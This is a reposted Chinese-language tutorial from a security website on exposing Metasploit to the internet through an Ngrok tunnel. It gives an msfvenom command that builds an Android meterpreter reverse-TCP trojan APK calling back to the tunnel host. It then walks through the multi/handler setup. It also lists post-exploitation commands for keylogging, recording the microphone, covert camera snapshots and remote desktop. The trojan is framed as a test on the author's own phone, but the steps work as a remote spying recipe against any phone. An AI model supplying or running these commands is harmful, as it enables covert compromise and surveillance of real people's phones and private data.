安基网 首页 安全 渗透测试 查看内容

作为内网杀手的metsploit如何在外网使用呢?

2019-6-1 09:15| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……这主要是因为你的身处于内 ...

经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!

经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……

这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!

什么是内网?内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。

什么是外网(也称为公网)?使用ADSL的用户,如果只有一个用户一台计算机在使用此宽带,没有使用路由功能,而是用拨号软件直接拨号上网的,这种情况下,该用户目前所处的网络为外网,外网的用户都拥有一个属于自己的独立IP地址.公网的计算机和Internet上的其他计算机可随意互相访问。

如何判断你是网络是内网还是外网呢?输入WIN+R进去MS-DOS命令行里面,输入:ipconfig看一下自己的ip:如果你的IP地址属于保留地址(保留地址开头为:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的计算机就是运行在局域网内。

今天给大家介绍一个简单方法让metsploit连入外网的方式,使用一个内网穿透工具Ngrok。

打开网址:https://www.ngrok.cc然后注册账号登录。选择一个免费的隧道:

据图配置

本地端口,如果是kali我们需要输入ifconfig看一下自己的ip填进去。

然后找到自己刚刚开通的隧道,看一下自己的配置信息,这里的隧道id和隧道端口,服务器地址接下来要用的:

下载自己对应的客户端,我用的是kali Linux所以选择了一个64位的Linux版本的。

下载之后你自己找一个目录放进去,然后在终端打开这个指定目录并输入命令:./sunny clientid 隧道id

出现下面的转发成功界面就OK了(服务器地址和ip地址被我打码了,你们的电脑上可以看到的)。

连上外网之后的metsploit做渗透测试的时候就如鱼得水了。比如你在局域网里面想要渗透一个手机。需要让手机和电脑连在一个WiFi上面,但是现在就不需要了。

下面给大家来一个简单尝试吧。

打开metsploit控制台,输入下面的命令生成一个安卓木马(这是最简单最基础的生成方式了)

msfvenom -p android/meterpreter/reverse_tcp LHOST=刚才创建的隧道服务器地址 LPORT=隧道端口 R >/root/muma.apk

安装到自己的手机上,不要问为啥报毒!它就是一个简单的病毒!

(免杀不是简单重点,以后会讲免杀技术)。

接下来输入下面的命令:(一句一句的输入)

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数配置ip:这里的ip是kali本机的,和端口是刚才ngrok里自定义的本地端口

最后如何exploit

安卓机点一点病毒,就连上了,完全不用在同一局域网下面,手机用自己的4G网即可。

接下来就可以操控手机了。

keyscan_start:开始键盘记录

keyscan_dump:下载键盘记录

keyscan_stop:结束键盘记录

record_mic:录制声音(如果目标主机上有话筒的话)

webcam_chat:查看摄像头接口

webcam_list:查看摄像头列表

webcam_stream:获取摄像头视频

run vnc:开启远程桌面webcam_stream 开启摄像头

webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6696993949619323403/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人
1

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

 最新
返回顶部